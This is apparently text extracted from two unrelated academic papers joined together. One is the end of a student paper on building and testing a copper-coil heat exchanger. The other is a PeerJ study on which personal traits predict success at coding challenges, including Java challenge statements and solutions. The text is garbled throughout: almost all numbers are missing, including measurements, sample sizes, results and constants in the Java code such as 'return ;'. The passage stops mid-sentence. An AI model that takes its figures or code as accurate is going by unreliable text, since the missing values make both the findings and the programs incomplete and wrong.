manufactured in three major steps. first, we bout ¼ inch plywood and drew the dimensions that would sufficiently hold the tube and reservoir tank. the two vertical pieces were measure to the dimensions of ' wide and . ' tall with a " diameter half circle cut at the top to hold the tube in place. the base piece was also dimensioned to be ' wide and ' long to hold the tube at the two ends. a small shelf to hold the pump and valves was dimensions to be ' wide and " long. the second steps consisted of cutting all the pieces. this work used two tools to accurately cut the plywood, a circular and jig saw. the circular saw was used to cut the straight angles while the jig saw was used to cut the " diameter half circles. after the pieces were cut the stand could be assembled. the third step consisted of using angle brackets, screws and the three- stand pieces to assemble the stand. three angle brackets were screwed into each inside portion of the base and vertical pieces with two angle brackets on the outside to ensure stability. the shelf was fastened in a similar manner to the outside of the vertical piece. a. reservoir this work manufactured the reservoir using copper plates, angle brackets, screws, jb weld, and flex seal. first, it the precut copper plates and angled them against each other at degrees to construct an open box, and screed the brackets in place at points per corner. next, with duct taped the outside of the box to ensure a tight seal between the two pieces and applied the jb weld to all the seams. after an hour of curing we applied flex seal to the entire surface of the inside. this sealed between the screws ensuing a waterproof reservoir. b. slides the slides were manufactured using a solidworks model, which was then converted over to a cam file. the milling machines would have taken about hours per slide, so we opted to use the lpm. the process with minutes per part, which was a noticeable efficiency difference. the center hole was a quarter of an inch and was pressed out. the plate was then clamped down into the lpm and the larger holes began to mill. then the circles were cut out from the existing material, with a helix pattern. a hole was drilled at both ends of the shell to allow the ends of the coil to protrude out so that we could connect the fluidics tubing. once that was all done the end caps were placed on the ends of the shell which shrank the shell diameter from ” to ". figure . the heat exchanger prototype international journal of advanced network, monitoring and controls volume , no. , after that insulation was put on the whole shell assembly to prevent any possible heat from escaping. with the whole shell finished it was time to put the rest of the manufactured parts together. the shell assembly was placed into the " diameter half circles in the wooden stand so that it could be supported horizontally. the copper reservoir was then placed underneath the shell assembly. fluidics tubing was then connected from one of the ends of the copper coil from the shell to one side of the reservoir tank. this where the water will go after going through the heat exchanger. an overflow hole and tube were made in the reservoir to be directed back towards the sink. electronic valve a was used to pull water from the hot sink water that was stored in a trash car and heated by a bunsen burner. piping from the trash can to electronic valve a, then the valve to the pump was made. electronic valve b was used to pull water from the reservoir tank. piping from the reservoir tank to electronic valve b, then the valve to the pump was made. the final piping from the pump to the inlet part of the coil completed the piping system. figure shows the heat exchanger prototype. figure . the electronic part of the heat exchanger two temperature controllers as shown in figure were used to regulate the opening and closing of the valves. the wires from electronic valve a are connected to controller a. the wires from electronic valve b are connected to controller b. the source connection for the two controllers are to be wired together and connected to a dc source controller supplied by the electrical lab. figure shows testing the heat exchanger. figures , and show the effect of time on the air outlet temperature. figure . testing the heat exchanger figure . time vs. outlet air temperature at % wind speed international journal of advanced network, monitoring and controls volume , no. , figure . time vs. outlet air temperature at % wind speed figure . time vs. outlet air temperature at % wind speed figure . effectiveness vs wind speed initially the heat exchanger was tested with fan speeds starting at % increasing up to % in increments of . however, it was determined that by increasing the fan speed percentage so rapidly there would not be enough time for maximal heat transfer. knowing this, it was determined that the heat international journal of advanced network, monitoring and controls volume , no. , exchanger would be best to test at only three different wind speeds ( , %, %) and to take the temperature readings every minutes to allow for maximal heat transfer. before testing the heat exchanger for the second trial it was hypothesized that since slower fan speeds would allow the air to stay in contact with the inside of the heat exchanger longer the efficiency would be higher. looking at the graphs above this hypothesis was proven to be correct. every minutes the inlet and outlet temperatures of both the air and the water were recorded based on the readings given from the thermocouples. while running the heat exchanger the pump sent the water through the copper coils at a constant velocity of . m/s. for the three different fan speed percentages of , , and , the air velocities were measured at . m/s, . m/s, and . m/s. at each fan speed temperature readings were taken, the temperature change between the st and th reading was then used to determine the efficiency of the heat exchanger at the specified air and water velocities with respect to the initial temperatures of both the water and air. by using the same equations that were used to analyse the initial four designs the effectiveness of the heat exchanger at the specified speeds was determined to be . at %, . at % and . at % as shown in figure . iv. conclusion after months of research, designing, building and testing we concluded that the heat exchanger provides an effectiveness that is below average compared to common industrial designs. some variables that may have affected our results are the following; since it is the middle of the summer the outside temperature is quite high making it difficult to determine the true change in temperature since the inlet and outlet temperatures are quite close to one another. if this test was done in the winter are values could potentially be much better. also, the reservoir tank had a hard time maintaining a warm enough temperature so that could start using the water from it rather than main water source. this may be due to the fact that we used flex seal to make sure the tank was water tight. the thermal conductivity of flex seal is much lower than copper which is what the tank is made out of. by spraying it everywhere the thermal conductivity of the tank as a whole might not be as high as thought. overall heat exchanger did what wanted it to and by making these and other modifications the work believe can perform better. acknowledgements this project very much to thank wentworth project lab and professor jackson for their support. references [ ] r.l webb, “performance evaluation criteria for use of enhanced heat transfer surfaces in heat exchanger design”, international journal of heat and mass transfer, volume , pages - . [ ] b. linnhoff and e. hindmarsh, “the pinch design method for heat exchanger networks”, chemical engineering science, volume , pages - . [ ] r.l webb and e.r.g eckert, “application of rough surfaces to heat exchanger design”, international journal of heat and mass transfer volume , pages - . [ ] adrian bejan, “general criterion for rating heat exchanger performance”, international journal heat and mass transfer, volume , pages - . submitted august accepted january published february corresponding author marvin wyrich, marvin.wyrich@iste.uni-stuttgart.de academic editor philipp leitner additional information and declarations can be found on page doi . /peerj-cs. copyright wyrich et al. distributed under creative commons cc-by . open access a theory on individual characteristics of successful coding challenge solvers marvin wyrich, daniel graziotin and stefan wagner institute of software technology, university of stuttgart, stuttgart, germany abstract background. assessing a software engineer’s ability to solve algorithmic programming tasks has been an essential part of technical interviews at some of the most successful technology companies for several years now. we do not know to what extent individual characteristics, such as personality or programming experience, predict the perfor- mance in such tasks. decision makers’ unawareness of possible predictor variables has the potential to bias hiring decisions which can result in expensive false negatives as well as in the unintended exclusion of software engineers with actually desirable characteristics. methods. we conducted an exploratory quantitative study with software engineering students to develop an empirical theory on which individual characteristics predict the performance in solving coding challenges. we developed our theory based on an established taxonomy framework by gregor ( ). results. our findings show that the better coding challenge solvers also have better exam grades and more programming experience. furthermore, conscientious as well as sad software engineers performed worse in our study. we make the theory available in this paper for empirical testing. discussion. the theory raises awareness to the influence of individual characteristics on the outcome of technical interviews. should the theory find empirical support in future studies, hiring costs could be reduced by selecting appropriate criteria for preselecting candidates for on-site interviews and potential bias in hiring decisions could be reduced by taking suitable measures. subjects software engineering keywords programming performance, coding challenge, human factors, personality, experience, happiness, academic performance, technical interview introduction some well-known technology companies, including amazon, facebook, google and microsoft, made applicants perform algorithmic programming tasks as part of their technical interview process (mcdowell, ). the performance in these tasks might reveal how good a software engineer is at finding efficient and scalable algorithms to unknown problems and show his or her ability to debug and test a small piece of source code. in the following we refer to these tasks as coding challenges. although aspects such as interpersonal skills play an important role in technical interviews (ford et al., ), coding challenges form an essential part of the interviews and the subsequent evaluation of the candidates. how to cite this article wyrich m, graziotin d, wagner s. . a theory on individual characteristics of successful coding challenge solvers. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com mailto:marvin.wyrich@iste.uni-stuttgart.de https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. the fizz-buzz challenge is a trivial programming task that is used in interviews to filter out programmers with insufficient programming skills. the task is to write a program that prints the numbers from to . but for multiples of three print ‘‘fizz’’ instead of the number and for the multiples of five print ‘‘buzz". for numbers which are multiples of both three and five print ‘‘fizzbuzz’’ (ghory, ). to help candidates preparing for competitions, technical interviews and coding challenges in general, several books, online guides, practicing websites and experience reports exist (e.g., leetcode, ; dumitru, ; mcdowell, ; mongan, kindler & giguère, ). a plethora of material is available that aims to help the reader solve coding challenges successfully. we can see, however, that some software engineers perform better than others in solving coding challenges (google inc., ) and that this difference does not necessarily come all from preparation. practitioners report that they met computer science graduates who could not even solve simple programming tasks like the fizz-buzz challenge up to developers who aced almost every challenge in the finals of internationally recognized programming competitions. as with programming performance (scacchi, ), individual characteristics are likely to play a very important role in the performance of solving coding challenges. to the best of our knowledge, there is a knowledge gap in the software engineering literature to explain individual factors related to a successful solver. addressing the knowledge gap about individual characteristics of successful coding challenge solvers could be favorable for software companies as well. the companies’ unawareness of possible predictor variables, such as a candidate’s personality, may lead to biased hiring decisions and candidates with actually desired personality traits having less chances of getting hired. being aware of possible predictor variables could therefore help the company to better preselect candidates at an early stage of the interview process as well as identify ways to improve the current workforce. furthermore, failure to understand which characteristics make for a great coding challenge solver might bring failure in a technical interview. job opportunities might get lost. a knowledge gap in a research discipline, as in the case of coding challenges, requires the construction of theories. kajko-mattsson ( ) has argued that software engineering research has been suffering from a syndrome that causes researchers to jump from trend to trend. what happens is that isolated, usually small research problems are solved by one or more papers and then authors jump to a completely different issue. as a result, continues kajko-mattsson ( ), also echoed by johnson, ekstedt & jacobson ( ), the research community lacks a deep, yet basic understanding of the software development life-cycle and the theory behind all software engineering activities. we support the recent request for developing theories in software engineering and we agree with several authors that theory is what software engineering is missing the most (ralph, johnson & jordan, ; johnson et al., ; johnson, ekstedt & jacobson, ; johnson & ekstedt, ; wohlin, Šmite & moe, ). we conducted a study to explore the research question what individual characteristics make a good coding challenge solver? by a quasi-experiment, we empirically developed a theory for predicting the influence of such characteristics on the performance in solving coding challenges. we developed and evaluated the construction of the theory using an established framework for theories in information systems by gregor ( ) which we present in the next section. wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. research objectives and contributions the objective of our research is to construct a theory on how individual characteristics of a software engineer predict his or her performance in solving coding challenges. we contribute the following main results: • we found significant negative correlations between the affective state of sadness and the performance in solving coding challenges, as well as between the personality trait of conscientiousness and the performance. • significant positive correlations were found between variables related to the academic performance and the coding challenge performance, as well as between programming experience and performance. • these findings were brought together in a type iii theory for predicting (gregor, ). statistically significant results were achieved to offer a theory grounded in data and we offer the theory for testing by future studies. in the following section we provide a summary of related work on coding challenges and describe the scientific basis of our theory construction. in the ‘methods’ section we describe the research methodology in detail, including the design of our study, its sample, used coding challenges, candidates for predictor variables and the analysis procedure. findings of our study are presented in the ‘results’ section, followed by a discussion of the findings, limitations and implications of our study. background a coding challenge (also called programming challenge) is an algorithm and coding problem used to assess a programmer’s problem-solving skills. coding challenges are used in several areas of applications and websites exist that offer different types of coding challenges for learning, practicing, and competing with other users. in most cases, one has to find the most efficient algorithm or any correct algorithm within a limited amount of time. these are the coding challenges relevant to our work. other types of coding challenges include those that can be solved by completing code to win a game or by writing code that passes all given test cases. programming competitions, for example, use coding challenges as tasks for the participants. such competitions enjoy wide popularity. in , the acm international collegiate programming contest (icpc) recorded , students from , universities in countries (baylor university, ). in the same year, the winner of the google code jam prevailed against more than , competitors and won a grand prize of $ , (google inc., ). it is worth noting that bloomfield & sotomayor ( ) found most students were not even motivated by the prizes when participating in the icpc. they understood that participating in programming contests requires skills which are valuable for job interviews where technical questions are asked. research, on the one hand, focuses on the design and scoring of coding challenges in programming competitions. we elaborate on these aspects in the ‘methods’ section where we describe the selection of coding challenges selected for our study and how we wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. scored the solutions. on the other hand, existing research includes the usage of coding challenges for educational purposes such as the automated grading of assignments and teaching algorithms. for example, urness ( ) presented the hypothesis that interview question assignments would be beneficial for students because they require intense practice and are more motivating for the students due to their real-world applicability. in a course on data structures, urness ( ) compared the exam performance of students who were taught with long-term programming assignments with that of students who had to solve short-term interview-question assignments throughout the semester. urness ( ) found that students enrolled in the interview question assignment section had a slightly better average score in the final exam and that the interview question assignments were motivating for students. technical interviews in particular have not been investigated thoroughly in scientific literature yet. we identified only two recent relevant papers. ford et al. ( ) investigated whether there are company differences in interview criteria and how interviewers interpret criteria for software engineer job candidates. their research was motivated by an existing mismatch of candidates’ expectations of what interviewers assess and what they actually look for in a candidate, which consequently results in lost job opportunities. coding challenges from cracking the coding interview (mcdowell, ) were used as interview questions in mock technical interviews with university students and interviewers from nine different software companies. to evaluate a candidate’s performance, interviewers had to fill out an evaluation form for each candidate which included six criteria and an open response section. after the interviews the authors analyzed the evaluation forms to answer the research questions. first, they found consistent interviewers’ expectations for candidates among most companies. second, interviewers care about technical soundness but place an emphasis on interpersonal skills and effective communication. this finding is consistent with the results of previous studies on the demand for soft skills in software engineering. for example, matturro ( ) found that about % of job advertisements had at least one soft skill listed as a requirement. teamwork and communication skills but also analytical problem-solving skills were some of the most demanded skills. the interviewers in ford et al. ( )’s study noted that candidates had difficulties in communicating their knowledge. however, there is research on how to bridge the gap between what universities teach and what industry demands in terms of interpersonal and communication skills (e.g., teles & de oliveira, ). potentially excessive stress and cognitive load due to technical interviews in which candidates have to solve tasks on a whiteboard reinforce bias in hiring practices. for this reason, behroozi et al. ( ) conducted a study on the differences in stress and cognitive load between solving programming tasks on paper versus on a whiteboard. to assess the difference they used eye measures, measured by a head-mounted eye-tracker and computer vision algorithms. each of the eleven participants completed tasks under each of the two conditions (paper and whiteboard). the authors then conducted debriefing interviews and analyzed the eye tracking data. preliminary results suggest that problem-solving on the whiteboard results in higher cognitive load compared to solving programming problems wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. on paper. in addition, participants rated the whiteboard interview as more stressful. only in the whiteboard setting nervous tics displayed by participants were observed. without closer reference to technical interviews, attempts were made to predict how good a developer will perform in a specific environment, based on characteristics that we examine in part in our study. for example, borreguero et al. ( ) developed an index to find virtuous developers, which is based on the activities and contributions of the respective developers in open-source communities. the authors discuss similar work that aims, for example, at finding experts in such communities. although this is not about experts for solving coding challenges, at least we wanted to mention these related approaches in our work. further research is needed to evaluate the approach by borreguero et al. ( ) and to be able to compare our results with theirs on which individual characteristics best predict a developer’s performance in the respective environments. theory construction and representation to give a definition of what information systems researchers mean when they deal with theory, gregor ( ) proposed a taxonomy of five theory types in information systems research. each theory type has its own definition and consists of a set of structural components: means of representation, constructs, relationships, scope, causal explanations, testable propositions, and prescriptive statements. the theory for predicting, called type iii, ‘‘states what will happen in the future if certain preconditions hold’’ and ‘‘has testable propositions but does not have well-developed justificatory causal explanations’’ (gregor, : – ). we constructed a theory for predicting the influence of individual characteristics on the performance in solving coding challenges. with respect to the taxonomy and the relevant components for type iii theories, we ensured to conduct and describe our study accordingly. methods to answer the research question and consequentially develop the above-mentioned theory for predicting, we conducted an exploratory quantitative study in which participants had to solve three coding challenges on a computer and fill out questionnaires about their individual characteristics. exploratory research intends to gain information for further research through exploring a research question. ‘‘exploratory research cannot provide a conclusive answer to research problems [...], but they can provide significant insights to a given situation’’ (singh, : ). research design to motivate potential participants to take part in the study, they were told that the study would last at most min and that it was about coding challenges, similar to those used by several software and technology companies during their interview process. they were also told that the reason for the study is to find out why some software engineers perform better in coding challenges than others. per slot, one or two participants then were invited to a quiet room where they were provided with an informed consent form and introduced verbally to the study. we used the same set of instructions to make sure that every wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. coding challengesquestionnaires happinessintroduction and informed consent “... minutes ... about coding challenges ...” invite participants with broad description “pairs of integers” min. personality academic performance experience “mansion” min. “triple jump” min. /** task description */  public static int method() {    // todo   }  figure schematic representation of the research design. four questionnaires on the individual char- acteristics had to be completed alternating with solving three coding challenges. full-size doi: . /peerjcs. /fig- participant received the same information. a translated english version of our participation instructions is provided in the paper supplements. after the introduction, participants had the chance to ask questions before they started to fill out the first questionnaire. a schematic representation of the research design is provided in fig. . participants had to solve coding challenges implemented with java on a computer without the use of the internet or other resources. to make sure that there was no advantage or disadvantage for any participant due to not knowing the used development environment, participants were asked if they were familiar with eclipse and java. each coding challenge had to be solved individually and within a given time. there was a given method signature so that the type of the return value as well as the parameters of this method were defined. it was not allowed to change the method signature in any way. a description of the problem was provided as a comment above the method. we will describe the challenges in greater detail below. the task then was to implement the method with a time-efficient solution to the problem. it was allowed to add private methods if needed and to use methods and data structures of the predefined java packages. participants were told that the solutions would be evaluated by correctness and time complexity, which are common judgment criteria for technical interviews (mcdowell, ). while solving a coding challenge, participants were allowed to take notes on paper. in addition to the given method signature for each challenge, there was also a main method with an example call of the method to be implemented. the expected output was provided as well. we provided the example to make it easier for the participants to understand the task and to increase the likelihood that no further questions were necessary while a participant solved a coding challenge. the participants were allowed to run the main method and to modify it to add their own test cases if desired. there was no other feedback on the correctness or efficiency of a participant’s solution than what the main method tested. participants were told that there was no advantage in submitting a solution before the time was up. if a candidate implemented multiple solutions within the time limit, he or she had to decide which one to submit in the end. when evaluating the solutions wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. afterwards we only considered the implementation provided in the prescribed method signature. we report our evaluation steps in the ‘analysis procedure’ section. participants all participants of the study were software engineering students of the university of stuttgart and they had to be at least at the end of the second semester of their bachelor program. the reason for the latter requirement was that at this point a student has the fundamental knowledge of data structures, algorithms, and time complexity that was required for solving the coding challenges in a time-efficient way. in their second semester, software engineering students attend a lecture which is specifically about data structures and algorithms. the sample consisted of bachelor students at the end of their second semester, seven students who were at least at the end of their fourth bachelor semester and eleven students who studied in the master’s program. these students were personally invited by email. in total, participants took part in our study. five identified as female and as male. the average age of the participants was . years with a standard deviation of . . although limited geographically and culturally, the sample was rich as participants covered the whole spectrum of academic levels. furthermore, they represent potential participants of technical interviews, that is, fresh bsc and msc graduates in computer science and software engineering. coding challenges the criteria for a good task vary depending on the context, target group and what the reasons are for conducting or attempting a coding challenge. for example, an interviewer wants to test a candidate’s ability to develop an algorithm, whereas a teacher of a programming course might want to teach time and space complexity. coding challenges will be selected accordingly. from what we know from the opinions and experiences of interviewers, we can argue that the existence of the following characteristics of a coding challenge has proven its worth in technical interviews (mcdowell, ; mcdowell, ): a brute-force solution which describes an algorithm that systematically goes through all possible solutions to a given problem should not be the most efficient solution to the problem. the reason is that brute-force algorithms usually are the most obvious way of solving a coding challenge and so they are the first solutions that even a below-average coding challenge solver can come up with. if one reason for developing a coding challenge is to find out if a candidate can think critically about his or her initial solution and how this solution can be optimized, then coding challenges with an inefficient brute-force solution and ways to improve it are most suitable. again, for interviewers it is important to see the logical thinking process and how the candidate approaches an unknown problem (mcdowell, ). also, a coding challenge should therefore not just test a single piece of knowledge, for example, a particular programming language feature, except this is what the interviewer aims for. there would be a high chance that some otherwise good coding challenge solvers do not know about this single fact and thus the results become unreliable. more generally, mcdowell ( ) recommends interviewers to ‘‘use hard questions, not hard knowledge’’ to focus on problem-solving and other skills that cannot be learned quickly at work. wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. recommendations from researchers in the field of creating tasks for programming competitions are similar to the characteristics of good coding challenges for technical interviews. for example, burton & hiron ( ) identified short and easy-to-understand problem descriptions as one criterion for a good task on the international olympiad in informatics. another is the existence of several solutions of varying difficulty and efficiency. different from technical interviews, programming competition tasks also consider, for example, that tasks should be fun and allow participants to have learning experiences (dagiene & futschek, ). we followed the recommendations of the interviewers and researchers mentioned above and designed our study in a way that a participant only had to interact with his or her computer and that there should be no need for asking for further clarification. this is different from some technical interviews where the challenge description does not provide enough information to find a satisfactory solution and the candidate is expected to ask further questions before attempting to solve the coding challenge. in our study, we only measure the combination of finding and implementing an algorithm to a given coding challenge, and neither explicitly observe how well participants are at understanding problem statements nor how much a participant cares about requirements engineering. thus, in addition to the characteristics described above, for our study a good coding challenge was not only easily understandable but also unambiguous. we also chose challenges where finding an efficient solution was challenging but the implementation should have been straightforward, because we could not expect every candidate to be familiar with the particularities of the programming language. to avoid making the participants spend too much time on handling edge cases, some limitations to the input parameters were provided in the task description. the set of coding challenges we chose covers a range of concepts which are commonly required for solving coding challenges. this includes the use of appropriate data structures, an optimization problem, and recursive thinking. in the following we describe each of the three coding challenges. they were presented to the participants in german, which is their native language, to minimize misunderstandings. the time limit given for each challenge was for understanding the task, finding an algorithm, and implementing the algorithm. we piloted the study with a male student in a higher bachelor semester to make sure that the time limit for each challenge was sufficient for the participant to come up with a solution. the test participant was able to solve the first two challenges correctly with some time pressure for the first challenge and no time pressure for the second one. in addition, after the pilot test we showed the candidate possible solutions for the third task and it took only a short time until he understood the proposed solutions. this strengthened our assumption that the tasks can be solved and that they can be solved within the given time. additionally, after each challenge we assessed whether the participants felt that they were under time pressure. we report all assessed variables in section ‘conceptual model’. challenge —pairs of integers ( min) the first coding challenge, in listing , was considered to be the easiest one, at least when it comes to finding any correct solution to the problem. a brute-force algorithm where wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. every possible combination of two numbers is tested in two for-loops is straightforward and runs in o(n ), where n is the size of the integer array. another conceivable solution with a time complexity of o(n·log(n)) sorts first and then applies a binary search to find matching pairs. furthermore, by using an appropriate data structure one can come up with a solution that runs in o(n). such a solution is given in listing . challenge —mansion ( min) the second challenge was taken from the australian informatics olympiad and is presented in listing . in the main method there was a detailed example given including an ascii art that illustrated the scenario, similar to the example and illustration given in the task description of the aio task (http://archive.is/e qeg). one approach of solving this coding challenge is to use a sliding window of length w that covers w houses and is shifted along all the houses in the array. the sum of people living in these w houses is the amount of people living opposite the mansion. each time when shifting the window, one can either calculate the sum of all houses covered by the window or simply use the last sum and subtract the people from the one house that is no longer covered by the window and adding the number of people of the one house that is now covered by the window. the first solution runs in o(n·w) and the second solution runs in o(n), where n is the number of houses. this problem involves considerable problem translation, as it is a rather abstract task. we wanted to ensure that different common types of coding challenges were represented in our study and this task is a type of challenge that appears in technical interviews (see, e.g., mcdowell ( )). to prevent comprehension problems, the problem descriptions were presented to the participants in their mother tongue. during the experiment, the first author of this submission was present in the room to answer any questions that arose. of the participants, only one person asked for clarification of the mansion task. we have seen no indication that misunderstandings arose. challenge —triple step ( min) the third coding challenge is also the hardest one in our study. it is described in the book cracking the coding interview (mcdowell, ) and the ability of recursive thinking is beneficial to find an approach to solving this problem. the challenge itself is provided in listing . a simple recursive solution with a time complexity of roughly o( n) is in listing . an alternative implementation would be a recursive depth-first search for all possible permutations starting from the bottom of the staircase. in either case the time complexity is not ideal as the same subtrees have to be calculated multiple times. for example, in the recursive solution in listing for n= the algorithm calculates the solution for countways( ) twice. one could store the solutions to such a subproblem in an additional memory structure. this reduces the time complexity to o(n). as we told the participants that each solution is only evaluated by correctness and time complexity, we ignore the differences in space complexity. however, with the iterative solution in listing one can avoid the need for additional memory and get to a solution with a time complexity of o(n) as well. wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://archive.is/e qeg http://dx.doi.org/ . /peerj-cs. /** * in the given array, find the number of integer pairs with a given * difference. * * an example is given in the main method. * * the following applies: * numbers contains at least two integers * numbers contains no duplicates * dif >= */ public static int paircount(int[] numbers, int dif) { // todo return ; } public static void main(string[] args) { int[] numbers = { , , , , }; int dif = ; // expected output: // the pairs with a difference of two are: { , } { , } { , }. system.out.println(paircount(numbers, dif)); } listing : coding challenge public static int paircount(int[] numbers, int dif) { hashset<integer> set = new hashset<integer>(); int count = ; for (int i: numbers) { if (set.contains(i + dif)) { count++; } if (set.contains(i - dif)) { count++; } set.add(i); } return count; } listing : a solution to coding challenge in o(n) /** * you want to build a mansion along a road. on the other side of the street * there are houses, in which a certain number of people live. * * your mansion is as long as w houses together. * * place your mansion in such a way that on the other side of the street as * many people as possible live opposite your mansion. * this greatest possible number should be returned by this method. * * an example is given in the main method. * * the following applies: * <= w <= houses.length <= * the number of people in each house is >= */ public static int mansion(int[] houses, int w) { // todo return ; } listing : coding challenge wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. public static int mansion(int[] houses, int w) { int count = ; for (int i= ; i < w; i++) { count += houses[i]; } int lastwindow = count; for (int i= ; i + w <= houses.length; i++) { int currentwindow = lastwindow - houses[i- ] + houses[i- + w]; if (currentwindow > count) { count = currentwindow; } lastwindow = currentwindow; } return count; } listing : a solution to coding challenge in o(n) /** * a child is climbing up a staircase with n steps, and can hop either * step, steps, or steps at a time. implement a method to count how * many possible ways the child can jump up the stairs. * * an example is given in the main method. * * the following applies: * <= n <= * if n= return */ public static int countways(int n) { // todo return ; } public static void main(string[] args) { int n= ; // expected output: // these are the possibilities to climb the three stairs: // { , , }, { , }, { , }, { } system.out.println(countways(n)); } listing : coding challenge public static int countways(int n) { if (n< ) { return ; } else if (n == || n == ) { return ; } else { return countways(n - ) + countways(n - ) + countways(n - ); } } listing : a recursive solution to coding challenge in o( n) public static int countways(int n) { int result = ; int a= ; int b= ; int c= ; for (int i= ; i < n; i++) { result = a + b + c; c = b; wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. as opposed to aristotelian eudaimonia which is the realization of conducting a satisfactory life full of quality (haybron, ). b = a; a = result; } return result; } listing : an iterative solution to coding challenge in o(n) conceptual model based on existing literature, we created a conceptual model to aid our quantitative exploration. we included four constructs related to individuals that are potentially linked to coding challenge performance, namely happiness, experience, academic performance, and personality. we describe each of them in the following, justify their inclusion in our study with relevant literature and describe how we operationalized and measured. the measure of the coding challenge performance is described in the ‘analysis procedure’ section. we provide our conceptual model, variables, and operationalization in fig. . the following subsections describe the candidate constructs as well as a rationale for their inclusion. happiness before explaining the inclusion of happiness, we need to define it together with the related concept of affect. under a hedonistic view, happiness is a sequence of experiential episodes (haybron, ) and individuals are happy when they experience ‘‘an excess of positive over negative affect’’ (bradburn, : ). affect, in turn, has been defined by russell ( ) as ‘‘a neurophysiological state that is consciously accessible as a simple, nonreflective feeling that is an integral blend of hedonic (pleasure–displeasure) and arousal (sleepy–activated) values’’ (p. ). affect, in other words, is the basic building block of emotions and moods. we consider it a sensible choice to have happiness as a candidate predictor for coding challenge performance: happiness and affect in general have been found to positively impact job performance (e.g., oswald, proto & sgroi ( )) and analytic problem-solving (e.g., graziotin, wang & abrahamsson ( )). we have published extensively on the relationship between happiness and software developers’ performance while programming (e.g., graziotin et al. ( ); graziotin, wang & abrahamsson ( ), the latter being a theory of affect and performance while programming). in our studies, we found support for the happy, therefore productive (high-performing) developer. in our studies, when we had the need to quantitatively assess the happiness of developers (graziotin, wang & abrahamsson, ; graziotin et al., ), we opted for the scale of positive and negative experiences (spane, diener et al. ( )). spane converges to other similar measurement instruments and has been psychometrically validated in several large-scale studies (rahm, heise & schuldt, ; diener et al., ; silva & caetano, ; li, bai & wang, ; sumi, ; jovanović, ; corno, molinari & baños, ; du plessis & guse, ) including consistency across full-time workers and students (silva & caetano, ). spane assesses how often a participant has experienced several affective states over the past four weeks. six positive and six negative states are graded on a -point scale of wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. personality operationalized by agreeableness, conscientiousness, extraversion, neuroticism, openness measured using german version of the big five inventory experience operationalized by experience with coding challenges¹, programming², java² and work². open source³ and stack overflow⁴ contributions measured using ¹ -point frequency scale, ² years, ³ number of pull requests on public profiles, ⁴ reputation academic performance operationalized by current gpa, b.sc. gpa,  exam gradings for courses on data structures and algorithms and study progress¹ measured using ¹ study program and number of semesters happiness operationalized by spane-p/n/b and affective states: positive, negative, good, bad, pleasant, unpleasant, happy, sad, joyful, afraid, contented, angry measured using scale of positive and negative experience (spane) coding challenge performance figure overview of the candidates for predictor variables, their operationalization and measure- ments. investigated relationships with the coding challenge performance are represented as dashed lines. footnotes for operationalizing variables refer to the used measure for this operationalization within the same rounded rectangle. full-size doi: . /peerjcs. /fig- frequency. the positive and negative affective scores can be summed to form the spane- p(ositive) and spane-n(egative) dimensions, which range from to . a subtraction of the spane-n from the spane-p value results in the affect balance, or spane-b (diener et al., ), dimension which can vary from − to . a value of indicates a balance of frequency of positive and negative affective experiences, and − and + indicate the negative and positive extremes, respectively. experience for us, experience is ‘‘knowledge, skill, or practice derived from direct observation of or participation in events or in a particular activity’’ and ‘‘the length of such participation’’(merriam-webster ( ), online). in particular, we were interested in the practical programming-related experience of software engineers and its relation to the coding challenge performance. programming experience is a multi-faceted construct that is usually expressed in years (e.g., mäntylä et al. ( )). it is widely accepted that the more experienced software engineers are, the higher their productivity will be (siegmund et al., ) and, more interestingly for the present study, their program comprehension abilities (siegmund et al., ). this is why we included experience in our set of candidates to predict coding challenge performance. we operationalized the construct of experience with frequency of coding challenges over the last year, general, java-related, and professional programming experience in years, but also reputation on stackoverflow.com. we included the latter because developers rely on it, draw on the knowledge from experts at different levels, and developer expertise wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. we report some examples here but direct the reader to the work by cruz, da silva & capretz ( ) for many more references and interesting points. is well represented by good questions and answers on it (abdalkareem, shihab & rilling, ; pal, harper & konstan, ; kumar & pedanekar, ). for similar reasons, we also operationalized experience with the number of pull requests on github.com as they are positively correlated to several experience measures (rahman & roy, ). academic performance academic performance, or academic achievement, is ‘‘the extent to which a person has accomplished specific goals that were the focus of activities in instructional environments, specifically in school, college, and university’’ (steinmayr et al. ( ), online). while it would seem sensible to expect a positive correlation between academic performance and coding challenge performance, the literature did not provide any strong indication on either side. sackman, erikson & grant ( ) neither found a correlation between the performance of experienced programmers and trainee class grades nor between the performance and the score in programming ability tests; however, darcy & ma ( ) found that participants with a higher academic performance performed better in their programming task. building upon a non-established truth on academic performance, we included academic performance as a candidate for predictors to coding challenge performance, and we operationalized the construct with the students’ gpa score and exam grades for two courses on data structures, algorithms and complexity. the first course is called data structures and algorithms and students usually take it in their second bachelor semester. the second course is called algorithms and complexity and students usually take it at a later stage of their bachelor studies. the latter course covers algorithm complexity in more detail while the first course gives a practical introduction to the usage of data structures and algorithms for common problems. the two courses have different examiners. we also asked for the current semester in which the students are enrolled at as a way to assess the seniority of the participants. personality software engineering research on 